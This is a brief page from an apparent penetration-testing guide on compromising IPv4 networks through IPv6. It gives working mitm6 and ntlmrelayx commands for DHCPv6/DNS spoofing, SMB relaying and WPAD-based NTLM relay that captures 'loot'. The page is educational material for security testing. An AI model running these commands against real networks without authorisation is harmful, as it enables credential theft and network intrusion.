Basic attack

This page describes how you can compromise IPv4 networks via IPv6

The principle is pretty much the same as the one we saw earlier with increased effectiveness.

First we start mitm6, which will start replying to DHCPv6 requests and afterwards to DNS queries requesting names in the internal network.

mitm6 -d test.local

For the second part of our attack, we use ntlmrelayx to relay the captured hashes. Now i will show two possible ways to use this tool, first through a simple SMB relay like we saw earlier

ntlmrelayx.py -6 -tf Targets.txt -socks -smb2support

In this case, the attack is pretty much the same as the one we saw earlier we juste replaced responder with mitm6 for the obvious reasons previously mentionned.

now, another attack is possible through WPAD serving. WPAD is a protocol used to ensure all systems in an organization use the same web proxy configuration. Instead of individually modifying configurations on each device connected to a network, WPAD locates a proxy configuration file and applies the configuration automatically. More details about this attack can be found in the references. using ntlmrelayx to also implement this attack, we launch the attack using the following command :

ntlmrelayx.py -6 -wh attacker.test.local -tf targets.txt -l loot -socks -debug

References :

mitm6 – compromising IPv4 networks via IPv6Fox-IT International blog

PreviousIPv6 Attacks NextCombining NTLM Relaying and Kerberos delegation

Last updated 4 years ago